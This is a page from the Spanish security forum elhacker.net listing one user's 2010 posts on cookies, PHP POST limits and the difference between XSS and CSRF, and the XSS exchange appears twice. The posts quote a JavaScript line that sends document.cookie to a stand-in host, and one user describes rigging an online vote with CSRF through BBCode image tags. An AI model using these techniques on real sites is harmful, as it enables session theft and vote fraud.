elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 [103] 104 105 106 107 108 109 110 111
1021  Seguridad Informática / Nivel Web / Re: Cookies en: 3 Febrero 2010, 00:05 am
Safari lo soporta apartir de su nueva versión 4.0
1022  Seguridad Informática / Nivel Web / Re: Cookies en: 2 Febrero 2010, 23:24 pm
Eso seguro lo usan para evitar robo de sesiones, pero si el navegador no soporta OnlyHttp() este no funcionara.
1023  Programación / PHP / Re: Method Get - Post en: 2 Febrero 2010, 22:32 pm
A lo que mucho se refieren con el método GET se llama QUERY_STRING.
El limite de carácter que puede almacenar una petición GET varia en diferentes navegadores.
Puedes mirar aqui

El limite de carácter del método POST se puede especificar. Yo por ejemplo instale php 5.2.10, para saber el limite de carácter de POST es necesario mirar el php.ini en la linea:
Código:
post_max_size = 8M
O tambien con el siguiente comando:
Código:
yoya@yoya-desktop:/etc/php5/$ cat php.ini|grep post_max
post_max_size = 8M

Saludos.
1024  Seguridad Informática / Nivel Web / Re: Cookies en: 2 Febrero 2010, 20:50 pm
Facir, como usas un addon para ver las cookies mejor, ps mira, las cookies de elhacker cambian al finalizar la sesión.



Saludos.
1025  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 29 Enero 2010, 00:26 am
Lo de formulario es XSRF/CSRF no XSS...
1026  Programación / PHP / Re: Expresión regular en: 25 Enero 2010, 23:57 pm
Deberian haber unas cuantas pruebas, asi uno pasa un buen rato xD.
1027  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 25 Enero 2010, 17:55 pm
asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.
Y es verdad, no me fijé, el ‭‬‭‬‭‬‭‬javascript no se ejecuta en el server.
Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬‭‬‭‬javascript "document.topic.submit()" eso es ‭‬‭‬‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo ‭‬‭‬javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.
Eso si lo llamas en plan [nobbcode][nobbcode] :
No funciona
Porque el ‭‬javascript lo ejecuta solo el navegador, y si el navegador cree que eso es una imagen no buscará código ‭‬javascript. El document.form.submit() lo hace el navegador no el server.

Um.. claro porque el unico que interpreta el codigo javascript es el navegador, Osea, Por medio de la peticion GET con tags de img Si funciona, por medio de POST puse varias opciones como img, inframe, etc...
Por algo deje un link sobre un tema similar de ejecutar XSRF mediante POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html
1028  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 25 Enero 2010, 16:18 pm
XSS es parecido aa CSRF/XSRF, tambien con XSS permanente puedes aplicar CSRF o XSS Tuneling...

Lo que pasa esque XSS no es solo robar cookies, puedes hacer atakes mas elaborado dependiendo de tu conocimiento sobre javascript y luego que quieres hacer... Porque estas aplicando puro javascript xD.
1029  Seguridad Informática / Nivel Web / Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python] en: 24 Enero 2010, 23:22 pm
Esto deviria ir en Bug y Exploit.
1030  Seguridad Informática / Nivel Web / Re: Duda sobre xss en: 24 Enero 2010, 22:48 pm
asi de facil se ejecuta ‭‬‭‬‭‬‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando ‭‬‭‬‭‬javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo ‭‬‭‬‭‬javascript, osea el ‭‬‭‬‭‬javascript se esta ejecutando en el host que tengo el archivo con ‭‬‭‬‭‬javascript y no en la pagina que quiero atakar.
Y es verdad, no me fijé, el ‭‬‭‬javascript no se ejecuta en el server.
Claro tio...
Pueden mirar este post que hay un tema parecido pero por POST.
http://foro.elhacker.net/nivel_web/problema_xsrf-t277033.0.html

La mejor forma de comprenderlo es practicandolo y veras su gran potencial... Una vez lo use para unas votaciones online y puse la url entre tags de img de BBCODE y funcionaba correctamente...
Pueden provarlo en localhost...

estas ejecutando el codigo ‭‬javascript "document.topic.submit()" eso es ‭‬javascript, y se fuera como vos decis yo te pongo, "window.location = 'miweb.com/cookie?c='+document.cookie"

Claro tio funcionara perfectamente pero se estara ejecutando en el serve donde subas el archivo con ese codigo javascript y no con el serve que quieres atakar. Osea te estas robando tus propias cookies y enviandotelas xD.
Páginas: 1 ... 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 [103] 104 105 106 107 108 109 110 111
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines